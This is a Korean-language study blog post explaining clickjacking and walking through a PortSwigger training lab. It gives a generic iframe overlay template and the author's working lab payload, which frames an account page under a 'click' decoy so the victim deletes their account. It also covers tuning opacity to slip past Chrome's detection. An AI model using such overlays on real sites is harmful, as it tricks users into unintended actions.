Clickjacking&AccessControl

지선·2023년 5월 9일

웹보안

이비전

목록 보기

6/10

Clickjacking이란?

사용자가 미끼 웹사이트를 통하여 다른 콘텐츠를 클릭해 숨겨진 웹사이트에서 실행 가능한 컨텐츠를 클릭하도록 속이는(오버레이) 인터페이스 기반 공격

iframe 태그 사용

적절한 너비 및 높이 위치 값을 사용해 미끼 웹사이트와 대상 작업이 정확하게 겹치도록 브라우저 내에 배치
절대 및 상대 위치 값: 웹사이트의 화면 크기, 브라우저 유형 및 플랫폼에 관계없이 미끼와 정확하게 겹치도록 하기 위해 사용
Z-색인: iframe 및 웹 사이트 레이어의 스택 순서를 결정
불투명도 값: iframe 컨텐츠가 사용자에게 투명하도록 0.0(또는 0.0에 가까운 값)으로 정의
브라우저 클릭재킹 방지: 임계값 기반 iframe 투명도 감지를 적용가능(예: Chrome 버전 76에는 이 동작이 포함되지만 Firefox에는 포함되지 않음)
공격자는 보호 동작을 트리거하지 않고 원하는 효과를 얻을 수 있도록 불투명도 값을 선택

<head>
	<style>
		#target_website {
			position:relative;
			width:128px;
			height:128px;
			opacity:0.00001;
			z-index:2;
			}
		#decoy_website {
			position:absolute;
			width:300px;
			height:400px;
			z-index:1;
			}
	</style>
</head>
...
<body>
	<div id="decoy_website">
	...decoy web content here...
	</div>
	<iframe id="target_website" src="https://vulnerable-website.com">
	</iframe>
</body>

portswigger에서 보여주는 예시

1. Basic clickjacking with CSRF token protection

wiener:peter를 통해 로그인하면 된다.
이 랩에는 로그인 기능과 CSRF 토큰으로 보호되는 계정 삭제 버튼이 포함되어 있는데 사용자는 미끼 웹 사이트에서 "클릭"이라는 단어를 표시하는 요소를 클릭한다.
계정 페이지를 구성하고 사용자가 계정을 삭제하도록 속이는 HTML을 만들면 해결된다고 한다.

우선 로그인해준 후, go to exploit serber를 통해 exploit server로 이동해준다.

Body를 바꿔준 후 Store하고 exploit 서버로 가면
바뀐 것을 확인할 수 있다. 여기에 iframe 태그를 통하여 투명하게 해서? 삭제 버튼을 만들면 될 것 같다.
위에 있는 코드를 가져와서
https://signes.tistory.com/entry/div-%EB%B0%8F-iframe-%EC%82%AC%EC%9A%A9%EB%B2%95
이것을 보면서 수정했다

<style>
	iframe{
		position:relative;
		width:1000px;
		height:1000px;
		opacity:0.5;
		z-index:2;
		}
	div{
		position:absolute;
		top:500px;
		left:100px;
		z-index:1;
		}
</style>
<div>click</div>
<iframe src="https://0aab00dc04dbe0d780e4171f006600ce.web-security-academy.net/my-account"></iframe>